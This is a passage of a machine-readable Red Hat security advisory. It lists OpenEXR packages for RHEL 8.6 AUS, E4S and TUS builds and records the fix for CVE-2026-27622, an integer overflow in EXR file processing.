"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.AUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"relates_to_product_reference": "AppStream-8.6.0.Z.TUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x",
"AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T15:26:09+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src",
"AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
